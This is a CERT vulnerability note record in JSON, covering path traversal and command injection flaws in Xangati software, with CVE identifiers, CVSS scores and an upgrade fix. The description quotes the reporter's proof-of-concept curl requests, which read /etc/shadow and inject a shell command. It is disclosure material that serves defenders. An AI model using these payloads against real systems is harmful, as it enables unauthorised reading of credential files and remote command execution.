{"vuid":"VU#657622","idnumber":"657622","name":"Xangati software release contains relative path traversal and command injection vulnerabilities","keywords":["directory","traversal","command","injection"],"overview":"Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.","clean_desc":"Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities. CWE-23: Relative Path Traversal - CVE-2014-0358\nThe reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities. curl -i -s -k  -X 'POST' \\\n-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \\\n--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \\\n'hxxps://127.10.10.5/servlet/MGConfigData' POST /servlet/MGConfigData HTTP/1.1\nkey=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5 POST /servlet/MGConfigData HTTP/1.1\nkey=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5 curl -i -s -k  -X 'POST' \\\n-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \\\n--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \\\n'hxxps://127.10.10.5/servlet/Installer' curl -i -s -k  -X 'POST' \\\n-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \\\n--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \\\n'hxxps://127.10.10.5/servlet/MGConfigData' CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359\nThe reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability. curl -i -s -k  -X 'POST' \\\n-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \\\n--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\\'cat\\\\x20/etc/shadow\\';$CMD;+YES' \\\n'hxxps://127.10.10.5/servlet/Installer' The CVSS score below is for CVE-2014-0359.","impact":"A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.","resolution":"Apply an Update: Upgrade to XSR11 or XNR 7 for the appropriate product.","workarounds":"","sysaffected":"","thanks":"Thanks to Jan Kadijk for reporting this vulnerability.","author":"This document was written by Jared Allar.","public":["https://cwe.mitre.org/data/definitions/78.html","https://cwe.mitre.org/data/definitions/23.html","http://xangati.com/products/"],"cveids":["CVE-2014-0358","CVE-2014-0359"],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2013-12-05T14:25:45Z","publicdate":"2014-04-14T00:00:00Z","datefirstpublished":"2014-04-14T20:30:43Z","dateupdated":"2014-04-14T20:30:46Z","revision":12,"vrda_d1_directreport":"1","vrda_d1_population":"1","vrda_d1_impact":"3","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"0","cam_population":"0","cam_impact":"0","cam_easeofexploitation":"0","cam_attackeraccessrequired":"0","cam_scorecurrent":"0","cam_scorecurrentwidelyknown":"0","cam_scorecurrentwidelyknownexploited":"0","ipprotocol":"","cvss_accessvector":"N","cvss_accesscomplexity":"L","cvss_authentication":null,"cvss_confidentialityimpact":"C","cvss_integrityimpact":"C","cvss_availabilityimpact":"N","cvss_exploitablity":null,"cvss_remediationlevel":"OF","cvss_reportconfidence":"C","cvss_collateraldamagepotential":"ND","cvss_targetdistribution":"L","cvss_securityrequirementscr":"ND","cvss_securityrequirementsir":"ND","cvss_securityrequirementsar":"ND","cvss_basescore":"9.4","cvss_basevector":"AV:N/AC:L/Au:N/C:C/I:C/A:N","cvss_temporalscore":"8.2","cvss_environmentalscore":"2.052041704272","cvss_environmentalvector":"CDP:ND/TD:L/CR:ND/IR:ND/AR:ND","metric":0.0,"vulnote":null}